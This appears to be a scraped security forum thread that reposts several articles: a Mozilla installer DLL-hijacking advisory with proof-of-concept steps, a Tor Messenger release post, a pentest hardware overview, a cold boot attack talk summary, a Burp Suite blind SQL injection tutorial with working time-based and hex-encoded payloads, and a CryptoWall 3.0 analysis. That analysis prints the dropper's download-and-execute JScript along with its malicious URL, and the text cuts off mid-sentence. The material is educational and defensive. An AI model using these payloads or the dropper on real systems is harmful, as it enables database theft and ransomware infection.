Nytro

Arbitrary code execution resp. escalation of privilege with Mozilla's SETUP.EXE From: "Stefan Kanthak" <stefan.kanthak () nexgo de> Date: Wed, 28 Oct 2015 20:04:23 +0100 Hi @ll, Mozilla's (executable) full setup packages for Windows allow arbitrary code execution resp. escalation of privilege: their SETUP.EXE loads SHFOLDER.DLL ['] from a temporary (sub)directory "%TEMP%\7zS<hex>.tmp\" created during self-extraction of the full setup packages. This vulnerability is well-known, every developer past absolute beginner should know about it: <https://capec.mitre.org/data/definitions/471.html> See <https://bugzilla.mozilla.org/show_bug.cgi?id=792106> for all the trouble Mozilla's developers went through to fix this vulnerability in the 7zip self-extractor. See <https://bugzilla.mozilla.org/show_bug.cgi?id=961676> for this vulnerability in their maintenance_installer.exe. Proof of concept: ~~~~~~~~~~~~~~~~~ 1. fetch any Mozilla full setup package (these are self-extracting archives built with 7zip), for example "Firefox Setup 38.3.0esr.exe" from <https://www.mozilla.org/en-US/firefox/organizations/all/> 2. extract this full setup package into an arbitrary directory, for example "%TEMP%\7zSxyz.tmp", using (again for example) 7za.exe x -o"%TEMP%\7zSxyz.tmp" "Firefox Setup 38.3.0esr.exe" 3. fetch <http://home.arcor.de/skanthak/download/SENTINEL.DLL> (see <http://home.arcor.de/skanthak/sentinel.html>) and save it as "%TEMP%\7zSxyz.tmp\shfolder.dll" 4. start "%TEMP%\7zSxyz.tmp\setup.exe" per double-click: the installer detection of Windows user account control (see <https://technet.microsoft.com/en-us/library/dd835540.aspx#BKMK_InstDet>) will chime in and prompt for consent resp. for an administrator password, then "%TEMP%\7zSxyz.tmp\setup.exe" loads "%TEMP%\7zSxyz.tmp\shfolder.dll" which displays a message box Mitigation(s): ~~~~~~~~~~~~~~ 0. DON'T USE EXECUTABLE INSTALLERS [²]! If your favourite applications are not distributed in the native installer package format of the resp. target OS: ask^WURGE their vendors/developers to provide native installation packages. If they don't: dump these applications, stay away from such software! 1. Turn off privilege elevation for standard users and installer detection for all users: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System] "ConsentPromptBehaviorUser"=dword:00000000 ; Automatically deny elevation requests "EnableInstallerDetection"=dword:00000000 See <https://technet.microsoft.com/en-us/library/dd835564.aspx> 2. deny execution in all "%TEMP%" directories and their subdirectories: * add the NTFS ACE "(D;OIIO;WP;;;WD)" meaning "deny execution of files in this directory for everyone, inheritable to all files in all subdirectories" (use CACLS.EXE /SDDL for example); * use "software restriction policies" resp. AppLocker. stay tuned Stefan Kanthak PS: Mozilla sits on this unfixed vulnerability for about 30 months: see <https://bugzilla.mozilla.org/show_bug.cgi?id=861012> ['] SHFOLDER.DLL is cruft from the last millennium, it was used on Windows 9x without Internet Explorer 4; see <https://support.microsoft.com/en-us/kb/241733> DONT USE the code shown in this MSKB article! See <https://msdn.microsoft.com/en-us/library/ff919712.aspx>, <https://msdn.microsoft.com/en-us/library/ms682586.aspx> and <https://technet.microsoft.com/en-us/library/2269637.aspx> [²] self-extracting archives and executable installers are flawed^W insanely stupid in concept and dangerous in practice. DON'T USE SUCH CRUFT! ALWAYS use the resp. platforms native package and archive format. For Windows these are .INF (plus .CAB) and .MSI (plus .CAB), introduced 20 years ago (with Windows 95 and Windows NT4) resp. 16 years ago (with Office 2000). Both .INF and .MSI are "opened" by programs residing in %SystemRoot%\System32\ which are therefore immune to this kind of "DLL (and EXE) Search Order Hijacking" attack. Since both .INF and .MSI can access the contents of .CAB directly they eliminate the attack vector "unsafe temporary directory" too. See <http://home.arcor.de/skanthak/temp/FIREFOX.INF> and <http://home.arcor.de/skanthak/temp/FIREFOX.DDF> as example of a native installer package for "Firefox 38.3.0 ESR (x86 de)": 1.a. create FIREFOX.CAB from the unpacked full setup package (see above; I used the german language version): run the command line MAKECAB.EXE /D SourceDir="%TEMP%\7zS<hex>.tmp\core" /F FIREFOX.DDF 1.b. create FIREFOX.CAB from the copy installed on your system: run the command line MAKECAB.EXE /D SourceDir="%ProgramFiles%\Mozilla Firefox" /F FIREFOX.DDF 2. install Firefox from FIREFOX.CAB: right-click FIREFOX.INF and then click "Install", or run the command line InfDefaultInstall.Exe "<path>\FIREFOX.INF" resp. RunDll32.Exe SetupAPI.Dll,InstallHinfSection DefaultInstall 132 <path>\FIREFOX.INF _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/ Sursa: http://seclists.org/fulldisclosure/2015/Oct/109

Evaluating, Testing and Breaking Security Software Breaking security software!!! Slides here: https://www.dropbox.com/sh/h2o7y5s5ijl2awx/AAAdeR4DTiCU_izt_1RJhXVAa?dl=0

Tor Messenger Beta: Chat over Tor, Easily Posted October 29th, 2015 by sukhbir in Today we are releasing a new, beta version of Tor Messenger, based on Instantbird, an instant messaging client developed in the Mozilla community. What is it? Tor Messenger is a cross-platform chat program that aims to be secure by default and sends all of its traffic over Tor. It supports a wide variety of transport networks, including Jabber (XMPP), IRC, Google Talk, Facebook Chat, Twitter, Yahoo, and others; enablesOff-the-Record (OTR) Messaging automatically; and has an easy-to-use graphical user interface localized into multiple languages. What it isn't... Tor Messenger builds on the networks you are familiar with, so that you can continue communicating in a way your contacts are willing and able to do. This has traditionally been in a client-server model, meaning that your metadata (specifically the relationships between contacts) can be logged by the server. However, your route to the server will be hidden because you are communicating over Tor.We are also excited about systems like Pond and Ricochet, which try to solve this problem, and would encourage you to look at their designs and use them too. Why Instantbird? We considered a number of messaging clients: Pidgin, Adam Langley's xmpp-client, and Instantbird. Instantbird was the pragmatic choice -- its transport protocols are written in a memory-safe language (JavaScript); it has a graphical user interface and already supports many natural languages; and it's a XUL application, which means we can leverage both the code (Tor Launcher) and in-house expertise that the Tor Project has developed working on Tor Browser with Firefox. It also has an active and vibrant software developer community that has been very responsive and understanding of our needs. The main feature it lacked was OTR support, which we have implemented and hope to upstream to the main Instantbird repository for the benefit of all Instantbird (and Thunderbird) users. Current Status Today we are releasing a beta version with which we hope to gain both usability and security related feedback. There have been three previous alpha releases to the mailing lists that have already helped smooth out some of the rougher edges. Downloads Linux (32-bit)Linux (64-bit)WindowsOS Xsha256sums.txt sha256sums.txt.ascThe sha256sums.txt file containing hashes of the bundles is signed with the key0x6887935AB297B391 (fingerprint: 3A0B 3D84 3708 9613 6B84 5E82 6887 935A B297 B391). Instructions On Linux, extract the bundle(s) and then run: ./start-tor-messenger.desktop On OS X, copy the Tor Messenger application from the disk image to your local disk before running it.On all platforms, Tor Messenger sets the profile folder for Firefox/Instantbird to the installation directory. Note that as a policy, unencrypted one-to-one conversations are not allowed and your messages will not be transmitted if the person you are talking with does not have an OTR-enabled client. You can disable this option in the preferences to allow unencrypted communication but doing so is not recommended. Source Code We are doing automated builds of Tor Messenger for all platforms.The Linux builds are reproducible: anyone who builds Tor Messenger for Linux should have byte-for-byte identical binaries compared with other builds from a given source. You can build it yourself and let us know if you encounter any problems or cannot match our build. The Windows and OS X builds are not completely reproducible yet but we areworking on it. What's to Come Our current focus is security, robustness and user experience. We will be fixing bugs and releasing updates as appropriate, and in the future, we plan on pairing releases with Mozilla's Extended Support Release (ESR) cycle. We have some ideas on where to take Tor Messenger but we would like to hear what you have to say. Some possibilities include: Reproducible builds for Windows and OS X Sandboxing Automatic updates Improved Tor support OTR over Twitter DMs Produce (and distribute) internationalized builds Secure multi-party communication (np1sec) Encrypted file-transfers Usability study How To Help Give it a try and provide feedback, requests, and file bugs (choose the "Tor Messenger" component). If you are a developer, help us close all our tickets or help us review ourdesign doc. As always, we are idling on IRC in #tor-dev (OFTC) (nicks: arlolra; boklm; sukhe) and subscribed to the tor-talk/dev mailing lists.Please note that this release is for users who would like to help us with testing the product but at the same time who also understand the risks involved in using beta software.Thanks and we hope you enjoy Tor Messenger! Sursa: https://blog.torproject.org/blog/tor-messenger-beta-chat-over-tor-easily

Hardware assisted penetration testing Penetration testing or pentesting is the practice of attacking your own or your clients’ IT systems in the same way a hacker would to identify security holes. Prior to start with the penetration testing you normally need to clearly define the scope and get a written consent from the client, in other words you need a pre-engagement contract signed by your client. Depending on the information in your possession it could be a white-box or a black-box pentest. You’ll also need to follow a standard methodology while conducting the test in order to ensure quality, reproducibility and comparability of your pentest. I’m not going to talk about this now but I plan to write a series of articles on this matter in the future. Every ethical hacker or penetration tester uses a variety of software in order to accomplish various tasks, some are well known frameworks for vulnerability assessment like Nexpose, Nessus and OpenVAS (just to name a few) or exploitation frameworks like Metasploit, CoreImpact Pro and Immunity Canvas, together with in-house tools. Obviously any software needs a personal computer, a server or a Cloud instance to run. Apart from this, there is a variety of other small devices and appliances that can assist a penetration tester during his job and today I’m going to talk right about this. HARDWARE KEYLOGGERS Hardware keyloggers are used for keystroke logging, a method of capturing and recording computer users’ keystrokes, including sensitive information like passwords and credit card numbers. They can be implemented via BIOS-level firmware, or alternatively, via a device plugged inline between a computer keyboard and a computer. They usually are made of a microcontroller, a flash memory and a USB or PS/2 connector. USB KEYLOGGER PS/2 KEYLOGGER KeySweeper Wireless Keyboard Sniffer COVERT KEYLOGGER KEYBOARD HARDWARE VIDEO LOGGER (FRAME GRABBER) SIGINT AND TEMPEST SYSTEMS SIGINT (SIGnals INTellingence) is intelligence derived from electronic signals and systems used by foreign targets, such as communications systems, radars, and weapons systems. SIGINT provides a vital window for our nation into foreign adversaries’ capabilities, actions, and intentions. TEMPEST is a National Security Agency specification and NATO certification referring to spying on information systems through leaking emanations, including unintentional radio or electrical signals, sounds, and vibrations. TEMPEST covers both methods to spy upon others and also how to shield equipment against such spying. The protection efforts are also known as emission security (EMSEC), which is a subset of communications security (COMSEC). For more information about TEMPEST see here: The Complete, Unofficial TEMPEST Information Page . TEMPEST ATTACK Van Eck Phreaking demonstration Another interesting demonstration was given in a 2009 BlackHat talk entitled “Sniffing Keystrokes With Lasers/Voltmeters – Side Channel Attacks Using Optical Sampling Of Mechanical Energy And Power Line Leakage” by Andrea Barisani and Daniele Bianco of Inverse Path Ltd. https://www.blackhat.com/presentations/bh-usa-09/BARISANI/BHUSA09-Barisani-Keystrokes-SLIDES.pdf WiFi HACKING DEVICES Devices usually made of a router with an antenna capable of packet injection and a custom firmware usually based on a linux distro with hacking tools installed (aircrack-ng and others). An example of such device is WiFi Pineapple: WIFI PINEAPPLE The WiFi Pineapple Mark V is the latest generation wireless network auditing tool from Hak5. With its custom, purpose built hardware and software, the WiFi Pineapple enable users to quickly and easily deploy advanced attacks using our intuitive web interface.From a man-in-the-middle hot-spot honeypot to an out-of-band pentest pivot box, the WiFi Pineapple is unmatched in performance, value and versatility. Another example of WiFi cracking device is Reaver Pro: REAVER PRO™ II Reaver Pro is able to crack a WEP password in only a few minutes, also WPA cracking is fast in case WPS is enabled. PENTEST BOXES MiniPwner – made up of a portable TP-Link MR3040 running OpenWrt MINI PWNER Pwnie Express solutions: PWN PLUG R3 PWN PRO PWN PHONE PWN PAD #r00tabaga is thinner than the MiniPwner, smaller and lighter than the WiFi Pineapple, and has a built-in 2000mAh LI-ON battery #R00TABAGA TrustedSec Attack Platform (TAP) – TAP will ensure that the system is always up-to-date with your latest patches and uses the PenTesters Framework (https://github.com/trustedsec/ptf) to automatically install all of your tools and keep them up-to-date. For hardware, it uses the Intel NUC series with a solid-state drive, 16 gigs of ram, wireless alfa attached for wireless assessments and a Verizon LTE card so you don’t have to worry about egress filtering if it isn’t available. TAP is used internally by TrustedSec and isn’t available for sale but the software is open source and can be found here: https://github.com/trustedsec/tap TAP HID ATTACKS A Human Interface Device is a device that can be plugged into the USB port of a computer and is recognized as a keyboard and automatically trusted and executed by the computer (unlike CDs/DVDs and normal USB drives that rely on the Autorun). It can be programmed in order to execute a payload (as keystrokes) that can do many things, even spawning a shell, dumping passwords and escalate privileges. Teensy – a complete USB-based microcontroller development system, in a very small footprint, capable of implementing many types of projects. All programming is done via the USB port. No special programmer is needed, only a standard “Mini-B” USB cable and a PC or Macintosh with a USB port. TEENSY There are some libraries available for Teensy, like PHUKD by IronGeek, SET, Kautilya and Peensy. Bad USB – a concept of HID attack vector presented at Blackhat 2014 by Karsten Nohl. USB RUBBER DUCKY – a HID attack tool by Hack5 RUBBER DUCKY MAKE YOUR OWN HACKER GADGET All of us have heard about or used Hacker Gadgets like the WiFi Pineapple, Minipwner, Pwn Plug, R00tabaga etc. They are fantastic to use for demos, in social engineering tasks, explaining security implications in a fun way to non security professionals and in actual pentest task automation! but what does it take to build one? In this course, we will teach you how to build a Hacker Gadget (or Pentest Gadget if you prefer) for less than $50 from scratch. How much technical expertise do you need to follow this course? – if you’ve installed Linux and ever configured an Access Point, you will feel right at home! See the course on PentesterAcademy, a SecurityTube.net initiative. BOOKS Some useful books for creating your own hacker gadget: Happy hacking! Author: Fabio Baroni Date: 2015-10-29 22:46:19 Sursa: http://www.pentest.guru/index.php/2015/10/29/hardware-assisted-penetration-testing/

Ce anume vrei sa modifici din program? Cat de complex e?

nullcon Goa 2015: Cold Boot Attack on DDR2 and DDR3 RAM by Marko Schuba Publicat pe 17 iun. 2015 Cold boot attacks enable access to the volatile memory of computers which are in a running state or have just been disconnected from power. The attack makes use of the remanence effect of DRAM: data in memory is not immediately erased after loss of power – it is slowly disappearing. Even after a minute without refresh, data can be found in DRAM. The approach can for instance be used to recover hard disk encryption keys of a locked computer. In the paper cold boot attacks on DDR2 and DDR3 RAM and their results are presented. While attacks on DDR2 have been demonstrated in the past, attacks on DDR3 have been less successful. The authors explain, how they attacked DDR3 RAM of various types and manufacturers. While many PC mainboards overwrite DDR3 before they are powered off, this is not the case for the board of the ASUS Notebook P53E which was used in our experiments. As a result, memory content could be extracted with a measured bit error rate between 0.0007% and 0.07%. For one DDR3 type an attack without cooling was possible, even though the error rate in that case was high (around 80%). Additional analyses of the experimental results revealed, that error rates strongly depend on the address space of DRAM. For example, one DRAM type had clear 64 kB memory block boundaries: while some blocks had bit error rates of 6% or 3%, others had 0% error rate. Other DRAM types also showed different error rates for different areas. The effect is most likely related to the initial state of the respective DRAM type. Thanks for watching this video and you can join us on various social networking sites. Website: nullcon - International Security Conference 2016 Facebook: NULLCON Twitter: nullcon (@nullcon) | Twitter

Da, util

Blind SQL Injection & BurpSuite - Like A Boss Posted on April 22, 20110 Comments ection used to be a lot easier a few years ago when it was less known, web application security was less mature, and errors were often exposed. It's very easy to use a variety of methods to cause errors to display database names, table names, column names, and even row values... when errors are enabled. These days, the SQL injection flaws that I am finding are largely of the "blind" type. To take a rough guess, I'd estimate this to be the case at least 8 out of 10 times. That is fine because blind SQL injection is still relatively easy to exploit.... with SQL injection in general still being used to greatsuccess in the wild. There are plenty of SQL Injection tools out there that will work with blind or error-based vulnerabilities. Many of these are installed and ready to run on the BackTrack 4 R2. SQLMap is a good one but there are a lot and your success will vary. These tools can do more than just extract database data. They can get you root. Sometimes this just isn't in the cards for a variety of reasons and you just want to show proof of concept that you can pull back sensitive data through the web server. I love Burp's Intruder tool for this. I'll demonstrate some techniques below and use HacmeBank as a target even though errors are completely visible in this purposefully vulnerable app and blind techniques are not necessary. The first thing we do is identify the vulnerable request: We can send this request to the Repeater tool and inject the SQL syntax, " ' waitfor delay '0:0:30'-- " (omit the double quotes). The vulnerable web application will pass this SQL command directly to the login query causing a 30-second pause. That's all just great but we want to do better than just pause the database during our login query. Let's set the HTTP timeout length from 60 seconds to 29 seconds in Burp's timeout options. Ok, now we'll send our delay injection request over to the Intruder tool. This time the SQL syntax, " 'if (len(user)=1) waitfor delay '00:00:30'-- ." It's also necessary to now mark our payload position in Intruder. Put it where the "1" is. Now that the payload position is marked, we need to define the payload. The SQL question is "How long is the USER variable?" Using a numeric payload, we'll guess 1through 30, a wide margin indeed. One more thing to do is to set the Intruder threads to 1, otherwise when one thread delays the SQL database, the others will be delayed as well and false positives will abound. Now we should get the length of the "USER" variable in the SQL server when this Intruder attack is started. When the correct payload number is guessed, the application will pause for 30 seconds, expiring our 29-second Burp timeout value. At this point a good thing to know is what those 3 characters are that comprise the "USER" variable's length. Just open another Intruder tab and we'll change the attack quite a bit. This time the SQL syntax will be " ' if (ascii(lower(substring((user),1,1)))=100) waitfor delay '00:00:30'-- " and there are actually two changing payloads (highlighted in bold). One is the position of the character and the second is the ASCII decimal code of the character in that position. The first payload needs to be numeric and range from 1 to 3 since we know that's the number of the character positions whose ASCII codes we want to guess. For the next payload, we look up our ASCII codes and ponder a bit. 48-126 will get us 0-9, A-Z, and a-z. In our SQL syntax above, you'll notice that we're using the "lower()" function to reduce the number of ASCII code values to guess but our number range will include them anyway so we're not saving any time there. Since we're asking for a username, I doubt there are any special characters (32-47) in it so we'll just be lazy and use 48-126. Running this attack should yield the three ASCII codes for the SQL "USER" variable. Sorting the results by length will put all of the 0-length, timed out, "true," responses in line. Reading the timed out (true) values: Payload 1 value 1 = payload 2 value 100 which is "d" Payload 1 value 2 = payload 2 value 98 which is "b" Payload 1 value 3 = payload 2 value 111 which is "o" Dbo, a good proof of concept but we could have guessed it. Now let's go after some data. How about the SQL syntax, " ' if (ascii(lower(substring((select top 1 name from sysobjects where xtype=char(85) and name like '%user%'),1,1)))=100) waitfor delay '00:00:30'-- ?" This looks for a table that has the word "user" anywhere within. I'm not trying to be sneaky, and blind SQL injection is inherently not sneaky, so I'm just going to guess the length and set the first payload to 1 through 10. Hopefully the table is 10 characters or less in length. I'll keep the second payload at 48-126 (0-9, A-Z, a-z). Running this attack should produce the ASCII codes for the first table that contains the word "user." That looks like 102=fs, 98=b, 95=_, 117=u, 115=s, 101=e, 114=r, 115=s (fsb_users). Right on, so now we want the column names for this "fsb_users" table. For that we need to query the native Microsoft SQL "information_schema.columns" table. To do that, we'll use the following SQL syntax: " ' if (ascii(lower(substring((select top 1 column_name from information_schema.columns where table_name='fsb_users'),1,1)))=100) waitfor delay '00:00:30'-- ." Again we'll use two payloads, one for character position and the other for ASCII decimal code. Running this attack will enumerate the first column in the "fsb_users" table. That spells "user_id" which is not very important to me but it does mean that the syntax for the next column in the "fsb_users" table will be, " ' if (ascii(lower(substring((select top 1 column_name from information_schema.columns where table_name='fsb_users' and column_name>'user_id'),1,1)))=100) waitfor delay '00:00:30'-- ." Running this attack yields the second column name of the "fsb_users" table. That's better because this looks like a column name for which I would be interested in row values. The "user_name" table can be used again, iteratively, to retrieve the third column using the following syntax, " ' if (ascii(lower(substring((select top 1 column_name from information_schema.columns where table_name='fsb_users' and column_name > 'user_name'),1,1)))=100) waitfor delay '00:00:30'-- " However, let's take a leap of faith and guess at the password column using the "like" operative: " ' if (ascii(lower(substring((select top 1 column_name from information_schema.columns where table_name='fsb_users' and column_name like '%pass%'),1,1)))=100) waitfor delay '00:00:30'-- " Running this will give us the name of the first column in the "fsb_users" table that contains the string, "pass." So now we have the predictable, "password" column which we can pair with the "user_name" column to start pulling some rows out. The SQL syntax will be, " ' if (ascii(substring((select top 1 user_name from fsb_users),1,1))=100) waitfor delay '00:00:30'-- ." I took the "lower()" function out just in case the usernames are case-sensitive in the login function. I want to make sure we account for enough characters that might comprise the firstuser_name value so I'll bump payload 1 up to the range, 1 - 15. We'll leave the second payload the same as before. Running this attack should output the first "user_name" value in the "fsb_users" table. So the first "user_name" is "Jake_Reynolds." The next query will target this user's password. The SQL syntax is, " ' if (ascii(substring((select top 1 password from fsb_users where user_name = 'Jake_Reynolds'),1,1))=100) waitfor delay '00:00:30'-- ." The payload settings can be left alone assuming the user's password is 15 characters or less in length. Running this attack should reveal the password for the user, "Jake_Reynolds." Any web application worth it's salt is going to hash the password columns and use salt so that collision attacks are difficult. HacmeBank contains an unhashed database column. The following screenshot illustrates why you should make sure and encrypt or hash your password columns: "Jake_Reynolds/P@55w0rd" it is then. Let's test it out of course. Works for me. Let's take it a little further though. I have run up against web applications that filter for various SQL syntax like "select" and other basic SQL key words whilst still using vulnerable dynamic SQL statements on the back end. I've always maintained that input validation is not a very effective means of preventing SQL injection and that real remediation means changing your database access layer to use parameterized/precompiled queries. One way I've bypassed input filters that look for common words like "if" and "select" is to create a variable, cast it as hex, and execute it. Take the following SQL syntax for instance: " ';declare @P varchar(4000);set @P=cast(0x69662028617363696928737562737472696e67282873656c65637420746f7020312070617373776f72642066726f6d206673625f757365727320776865726520757365725f6e616d65203d20274a616b655f5265796e6f6c647327292c312c3129293d313030292077616974666f722064656c6179202730303a30303a333027 AS varchar(4000));exec(@P);-- " The 0x69662028617363696928737562737472696e67282873656c65637420746f7020312070617373776f72642066726f6d206673625f757365727320776865726520757365725f6e616d65203d20274a616b655f5265796e6f6c647327292c312c3129293d313030292077616974666f722064656c6179202730303a30303a333027 is simply a hex-encoded version of the string, " if (ascii(substring((select top 1 password from fsb_users where user_name = 'Jake_Reynolds'),1,1))=100) waitfor delay '00:00:30' . " One extra thing we need to do is to add payload processing rules in Intruder to hex-encode both of our payloads since they occur within the hex cast. Now when we run this attack, we get the same results as before and we retrieve the password for "Jake_Reynolds" with one exception. Our values are now ASCII-hex-encoded values of ASCII-decimal codes. This time, our results are hexadecimal values for our decimal ASCII codes. So if you follow it: Payload 1 value 0x31 = 1 = Payload 2 value 0x38 0x30 = 80 = "P" Payload 1 value 0x32 = 2 = Payload 2 value 0x36 0x34 = 64 = "@" Payload 1 value 0x33 = 3 = Payload 2 value 0x35 0x33 = 53 = "5" and so on until you get "P@55w0rd," an admittedly bad password to use on my precious FoundStone bank account. Anyway, that's blind, delay-based, SQL injection data extraction the hard way using BurpSuite to make it easier. Sursa: https://depthsecurity.com/blog/blind-sql-injection-burpsuite-like-a-boss

CryptoWall 3.0 traffic analysis Posted on October 29, 2015 by Admin A glimpse inside CryptoWall 3.0 Background CryptoWall is known to be one the most popular ransomware.The FBI says it has received 992 complaints about CryptoWall, with victims reporting losses of $18m. Symantec also said that ransomware attacks have more than doubled in 2014 from 4.1 million in 2013, up to 8.8 million. It’s using today’s most sophisticated exploit kit such as Nuclear, Neutrino, and Angler in order to infect the victim. Consequently, this ransomware is using all ways possible to infect victims. The main goal of this destructive malware is to search for all file with certain extensions on the computer victim and network drives to encrypt them. It then asks for a ransom, which is normally $500 USD (and doubles after a certain period of time) for decryption. CryptoWall payment pageInfection Vector The ransomware has multiple ways to infect victims. However, we often see malicious infected email attachments sent to victims containing the dropper. One of the dropper that we studied came from an email attachment in a .zip file. It contained an obfuscated JavaScript file which is used for downloading the payload. It is also common to see word documents containing a malicious VBA macro. .ZIP file received by email, containing a JavaScript fileAfter deobfuscation of the file, we got this code: function dl(fr, fn, rn) { var ws = new ActiveXObject("WScript.Shell"); var fn = ws.ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92) + fn; var xo = new ActiveXObject("MSXML2.XMLHTTP"); xo.onreadystatechange = function (){ if (xo.readyState === 4){ var xa = new ActiveXObject("ADODB.Stream"); xa.open(); xa.type = 1; xa.write(xo.ResponseBody); xa.position = 0; xa.saveToFile(fn, 2); xa.close(); }; } ; try { xo.open("GET", fr, false); xo.send(); if (rn > 0) { ws.Run(fn, 0, 0); }; } catch (er){ } ; }dl("http://22072014b.com/images/global1.jpg", "16477935.exe", 1);dl("http://22072014b.com/images/global1.jpg", "89555869.exe", 1); This script is used to download the payload (from a hard coded URL) of CryptoWall 3.0, rename it and execute it from the TEMP directory. It’s interesting to note that the original payload is a .JPG file, which is a simple trick to hide itself. We believe that this domain (22072014b.com) is owned by the bad guy and it’s also seems to use the fast flux DNS technique. However, this domain is currently suspended by the ICANN.Execution As described in many articles¹ ² ³, CryptoWall begins by: Generating a unique computer identifier by calculation of an MD5 hash base on the system hardware and software (Computer name, Volume serial number, OS version …) Spreading itself in a new folder in C:\ and the AppData folder then adding an entry in startup program Deactivating: Shadow Copies Startup repair Windows error recovery [*]And stopping: Windows Security Center Service Windows Defender Windows Update Service Windows Error Reporting Service and BITS [*]Injecting itself into explorer.exe , svchost.exe [*]Making a GET request to ip-addr.es to retrieve the external IP address [*]Making HTTP requests to retrieve the public key for encryption [*]Starting encryption (AES-256) of selected files, extensions and directory [*]Copying HELP_DECRYPT instructions in every folder in which files were encrypted Although this process is complex enough to make an article on it’s own, the area that we’ve focused on is mostly the network communication side.Emulate communication with the C&C In order to learn more about the communication with the Command And Control, a program was made to simulate the request of an infected computer.First, the malware uses a URL pre-coded in the payload to start the communication. In all cases, the URL’s are infected WordPress websites. Because infected WordPress gets cleaned up or suspended within a few weeks normally, CryptoWall comes with numerous pre-coded URL with which it will try to communicate. The URL changes each time we see a new sub-version of CryptoWall 3.0.The URL looks like the following:http://domain.com/wp-content/plugins/infected_path/3.phpAll communication with the C&C is encrypted in RC4. The RC4 key is passed in the URL parameter and the cipher text is in the POST method.The malware first sends a hello message to the C&C before getting the actual encryption key: Using this python, we can decrypt the message easily: Request: {1|crypt13|4FB5B06D293F2DD13810B2979DBA08E0|5|2|1||128.204.196.126} Response: {264|1} The message is formatted for the command and control, revealing: the message ID, the version of CryptoWall, the unique MD5 hash previously generated, some other flags and the public IP address of the computer.After, the infected computer replies with another message: Request: {7|crypt13|4FB5B06D293F2DD13810B2979DBA08E0|1} Response: {176|ayh2m57ruxjtwyd5.onion|1egeY33|NL|—–BEGIN PUBLIC KEY—– MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAyY6b3Ea6NYvFAz3BMBRr zS9TZrnAdg2FksXisD95iFBSbWjMXQlWf4YuU84cyDvmRBpicbaN6K3Rkk1EjW4G lAA3jEZi2IvapsJpKoXhMIVxOhqbni+LQMsdsnEB+3FGWNHW7YvBwUSDvJbD+0qG i1fNzbL/AZ8Wz5g7wbrUzGSsi+Yjj37nQuPRDz4AheKayMsz9ENvOLvqhA+Malpv eOLwDMncsRr4byu9QuWRCvyoas5z86IBq/l4LKGeJO1my6ICvRQZ4QExwDTQBWKy 0G7B8niBVYHDOHIe3Owp2C6y7WzolP97WCwsuYB2kmGHnhtas4uTRQ/6IYZcK47E gQIDAQAB —–END PUBLIC KEY—–} At this last stage, the C&C replied with the TOR link for the ransom, the personal ID and the public RSA key. The infected computer will then start encrypting files with that key.Knowing this, we were able to establish by ourselves the different value that would be sent to the C&C in our program. We only had to generate MD5 that hadn’t been already received by the ransomware server to make it believe that we were a new victim. One of the ideas was to exhaust the server with our requests. Using this program in a loop, we were able to generate many different unique ID’s and public keys. Since a unique ID is normally 7 characters long (case-sensitive, plus a mix of digits), 58^7 ID are possible in theory. Because we’re able to generate no more than 1000 requests per minute, it would have taken far too long to exhaust all ID possible.Investigation on the infected WordPress To advance further in the investigation, we chose to take a look at recent samples of CryptoWall 3.0 from Hybrid Analysis to find commonalities between the different infected WordPress. After looking at multiples infected pages, we didn’t notice a common vulnerabilities, except that the infected path always seems to be part of a WordPress plugin.However, two of the WordPress observed had a PHP backdoor installed, which is a PHP file that allows the attacker to have a web control panel: With this malicious code, they can access and control multiple things on the servers. Furthermore, this allowed us to download the code which serves to respond to infected computers. Getting our hands on this file allowed us to move forward to better understand the communication and the infection process. What we can see in this PHP code is that the ransomware: Decrypts the encrypted message with the RC4 key in the parameter Makes validation to ensure that the message is in the good format and strips the bracket Forwards the message content to the mothership at the hard coded IP address We tried it by installing a PHP server on a local computer and making a fake call to the CryptoWall PHP file. We then captured the traffic exchanged between the server and the mothership: Request: {7|crypt19|7A1A7EA984BD56663C7A5558576C3559|1} So it becomes clear that the infected WordPress only acts as a filter and a relay. It also helps to conceal the ransomware infrastructure.Since the file in question was used at the same time to respond to infected computers, we took the opportunity to add a few lines of code to record the requests made to it in a text file. We also neutralized the code by commenting the part which forwarded the request. The outputting file gave us information about the time at which the request was made, the originating IP address and the CryptoWall message (version, unique MD5 identifiers …) for each computer calling it.Each of these inputs represent a query made by an infected computer to this specific infected page. On the first website, we were able to collect data only for 29 hours before the account got suspended by the provider (2015-09-30 to 2015-10-02) and we got 40228 entries in the text file. The second one, lasted 88 hours before the bandwidth limit was exceeded and allowed us to get 130146 entries (capturing from 2015-10-23 to 2015-10-27).After removing redundant entries in both files by comparing the unique identifier of victims (MD5 hash), only 3546 entries were left from the first one and 15068 from the second one. The reason why so many inputs were duplicated is because a unique infected computer will sometimes make more than 2 requests before being able to receive an answer from the C&C.We then used Elastic Search and Kibana to visually represent the data: Requests made to the first WordPress site over 29 hours Requests made to the second WordPress site over 88 hoursWe then aggregated the data of both WordPress sites to pull out statistics about the victims. The MaxMind databases were used to find the country and the AS from the originating IP addresses of those entries: Top originating AS of victims Top country of victims World map representing victim’s location from our datasetMultiple sub-versions of CryptoWall were also observed: Different version used by CryptoWallBy regrouping both sets of data together and removing the duplicate entries based on the MD5 hash, we accumulated 18614 unique infected users. On the first set of data, 3546 unique ID’s were collected over a period of 29h, which makes approximately 122.27 unique victims per hour. On the second set of data, 15068 unique ID’s were collected, over a period of 88h, which makes approximately 171.22 unique victims per hour. Calculating the average of both, we obtain approximately 146 unique infected users per hour, which make 3504 per day and 105120 per month. Using numbers from USCert viaSymantec 2.9% of users pay the ransom approximately. With an average ransom of $500, this meant malicious actors profited $52560 per day, $1576800 per month and $18921600 per year just with this part of the infrastructure that was discovered. However, it is difficult to be 100% accurate with these numbers.Glimpse of the Mothership Since we now had the IP address of the mothership from the PHP files on the infected WordPress, we started investigating it. The first IP was 95.128.182.22 and the second 95.128.182.121. Both of the IP were registered by an ISP named TrustInfo, in Moscow, Russia. The IP addresses have at least 3 open ports in common: 22, 80 and 3389. By browsing through them, we can’t see much except a blank page on the main page. But after looking for other active pages on the servers, we found that the server status page was enabled: As you can see, the server is apparently hosting a TOR hidden website (xtpdvz6dnj5nnpe7.onion). This hidden website is also a known TOR address from the ransom of CryptoWall 3.0. It’s using NGINX proxy to forward requests. The POST requests that we’re seeing are all the different WordPress sites forwarding the requests to the MotherShip and the parameter on each of these requests are the only RC4 key for decrypting the communication. Accessing the ransom page directlyBy taking a look at the autonomous 